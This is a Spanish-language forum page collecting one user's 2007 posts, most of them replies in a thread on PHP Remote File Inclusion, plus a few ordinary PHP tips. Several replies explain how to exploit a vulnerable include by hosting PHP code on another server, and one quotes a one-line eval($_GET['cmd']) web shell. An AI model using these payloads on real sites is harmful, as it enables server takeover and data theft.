Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - yeikos

#71
Código (vb) [Seleccionar]
On Error Resume Next
#72
Nivel Web / Re: [?] File include
21 Agosto 2007, 00:09 AM
Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.
#73
Nivel Web / Re: [?] File include
20 Agosto 2007, 21:27 PM
Cita de: archivo.txt<?php
eval($_GET['cmd']);
?>

Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo.
#74
Nivel Web / Re: [?] File include
20 Agosto 2007, 20:38 PM
WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.

Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene:

Código (php) [Seleccionar]
<?php phpinfo(); ?>

Obtendremos como resultado la información de nuestro servidor, ya que
estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor.

En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require:

Código (php) [Seleccionar]
<?php
echo "<?php phpinfo(); ?>
";
?>


Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones.
#76
Nivel Web / Re: [?] File include
20 Agosto 2007, 16:54 PM
Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.
#77
Nivel Web / Re: [?] File include
20 Agosto 2007, 14:55 PM
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código (php) [Seleccionar]
<?php
echo "<?php phpinfo(); ?>
";
?>


En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código (php) [Seleccionar]
<?php phpinfo(); ?>
#78
Nivel Web / Re: [?] File include
20 Agosto 2007, 14:22 PM
Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.

PD: Date una vuelta por Google.
#79
PHP / Re: Duración de sesiones
20 Agosto 2007, 13:48 PM
Cita de: php.inisession.gc_maxlifetime = 1440; Indica el número de segundos que deben haber pasado desde la última actualización para que se considere basura.
#80
PHP / Re: Envio de email
18 Agosto 2007, 16:35 PM
Entre comillas...

Código (php) [Seleccionar]


[...]

if (mail("maties_6@hotmail.com", $asunto, $cuerpo)) {

[...]